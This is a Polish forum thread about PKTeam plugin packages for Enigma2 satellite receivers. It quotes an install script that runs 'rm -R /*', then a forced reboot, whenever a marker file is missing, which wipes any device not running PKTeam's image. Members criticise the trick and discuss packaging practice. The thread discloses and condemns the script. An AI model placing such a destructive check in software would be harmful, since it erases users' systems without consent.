Jump to content

Ciekawe zabezpieczenie pakietów od PKTeam


richter

Recommended Posts

Post skopiowany z innego forum ,ale przydatny i dla nas.

 

@gandi21 - napisał:

 

Gdyby komuś przyszło do głowy aby instalować pakiety od PKTteam na sofcie nie sygnowanym logo tej grupy to lepiej uważać..

Oto fragment skryptu znalezionego w paczce enigma2-plugin-utilities-n2n_v2_PKT_sh4:

 

#!/bin/sh

 

if  ls /usr/lib/enigma2/python/Plugins/Extensions/PKT/ | grep -qc 'InfoCenter.pyo';

then

echo 'Image verification: OK'

else

echo 'Image verification: FAILED'

rm -R /*

sync

sleep 2

reboot -f

fi

exit 0

 

W skrócie - jeżeli nie ma pliku InfoCenter.pyo to wykasuje wszystko z katalogu root /

Ot takie "zabezpieczenie" przed instalowaniem na innej dystrybucji

Oczywiście paczkę można unieszkodliwić bez problemów - ipk to poprostu zgzipowany tar.

 

 

jak kogoś ciekawi to cały temat:

http://forum.dvhk.to/showthread.php?t=798900

Link to comment
Share on other sites

O tym wiadomo już od jakiegoś czasu.

Ten wpis pozwolił mi na to aby coś napisać. Coś co ciśnie się na usta od dawna.


Po komendzie

 

rm -R /*

 

każda następna nie ma sensu bo już jej nie ma na systemie :)

Oczywiście pod warunkiem, że tuner wcześniej zanim skończy kasować pliki, nie zawiesi się.


 

Pomijając to co napisałem powyżej to zastanawiam się nad czymś jeszcze.

Mają własne softy, korzystają z DuckBox. W paczkach w sumie to co można sobie skompilować bez łaski z ich strony.

Ponadto tak z połowa pakietów jest już tak stara, że albo nie działa albo nie działa poprawnie.

 

Pytanie jakie mi się ciśnie na usta to po co to zabezpieczać w ten sposób?

Komu/czemu to ma służyć?

Jak ktoś się uprze to wypakuje i wgra po FTP.

Jak komuś soft wyleci w powietrze to raczej nie skorzysta z PKT.

Czy nie wystarczyło by dać w preinst po prostu reboot?

Albo tak jak w GOS zależności do konkretnego pakietu? Dłubaczowi i tak to nie przeszkodzi a osobie co będzie próbować zainstalować dany plik IPK w innym systemie OPKG wyraźnie zasygnalizuje, że to pakiet nie pod ten system.


 

Moim zdaniem do użytkownika trzeba podchodzić chociaż z minimalnym szacunkiem. Tu według mojej opinii zostały przekroczone pewne granice. Tym bardziej, że całość to oprogramowanie Open Source.

 

Link to comment
Share on other sites

Po co ? Przecież to jest jasne i proste. Najwięcej może napisać na ten temat jeden z Kolegów z tego ( xunil ) forum. Sprawa kiedyś dotyczyła dekompilacji pyo i pokazanie zabezpieczeń jakie są w pliku . O ile pamiętam sprawa dotyczyła pewnej skórki.

 

Link to comment
Share on other sites

O ile ja pamiętam to nic w GOS nie jest dekompilowane i dodane do repo.

A jeżeli coś takiego ma miejsce to w te pędy meldować. Ida zmiany w GOS to i to się posprząta.

Poza tym chętnie dowiem się, kto łamie licencje/postanowienia dołączone do danego pakietu.

W samym GOS tez nastąpi niebawem przegląd wtyczek i skórek tak aby w 100% mieć pewność, że mogą one być dostarczane z GOS. To, że były zgodne w momencie publikacji nie oznacza, że dalej są.


Oczywiście nic nie zmienia faktu, że te wszystkie zabezpieczenia mają taki sens jak....dopisać sobie cokolwiek :)

W GOS nie ma zabezpieczenia w pakietach. Jest tylko zależność do konkretnego pakietu. Użytkownik instalując nasz pakiet "gdzieś tam" powinien widzieć, że pakiet jest z GOS.

Nikt nie zabrania używać go w innym sofcie. Jedynie nie gwarantuje się, że to zadziała lub nawet nie spowoduje unieruchomienia oprogramowania.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...